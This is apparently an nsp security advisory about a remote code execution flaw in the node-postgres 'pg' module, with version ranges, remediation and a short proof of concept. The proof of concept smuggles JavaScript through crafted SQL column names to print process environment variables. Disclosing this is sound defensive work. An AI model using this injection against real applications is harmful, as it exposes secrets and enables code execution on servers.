Remote Code Execution

Module: pg

Published: August 13th, 2017

Reported by: Sehrope Sarkuni

CVE-NONE

CWE-

Vulnerable: < 2.11.2 || >= 3.0.0 < 3.6.4 || >= 4.0.0 < 4.5.7 || >= 5.0.0 < 5.2.1 || >= 6.0.0 < 6.0.5 || >= 6.1.0 < 6.1.6 || >= 6.2.0 < 6.2.5 || >= 6.3.0 < 6.3.3 || >= 6.4.0 < 6.4.2 || >= 7.0.0 < 7.0.2 || >= 7.1.0 < 7.1.2
Patched: >= 2.11.2 < 3.0.0|| >= 3.6.4 < 4.0.0 || >= 4.5.7 < 5.0.0 || >= 5.2.1 < 6.0.0 || >= 6.0.5 < 6.1.0 || >= 6.1.6 < 6.2.0 || >= 6.2.5 < 6.3.0 || >= 6.3.3 < 6.4.0 || >= 6.4.2 < 7.0.0 || >= 7.0.2 < 7.1.0 || >= 7.1.2

Overview

A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name.

The announcement from node-postgres mentions 2 likely scenarios in which you would likely be vulnerable.

  1. You are executing unsafe, user-supplied sql which contains a malicious column name like the one in the proof of concept below.
  2. You are connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.

Proof of concept

const { Client } = require('pg')
const client = new Client()
client.connect()

const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`

client.query(sql, (err, res) => {
  client.end()
})

Remediation

Upgrade to one of these versions listed below.

  • pg@2.11.2
  • pg@3.6.4
  • pg@4.5.7
  • pg@5.2.1
  • pg@6.0.5
  • pg@6.1.6
  • pg@6.2.5
  • pg@6.3.3
  • pg@6.4.2
  • pg@7.0.2
  • pg@7.1.2

References

Sign up FREE for
nsp Continuous Security

Free for open source and the first private repo,
then just $1/mo per private repo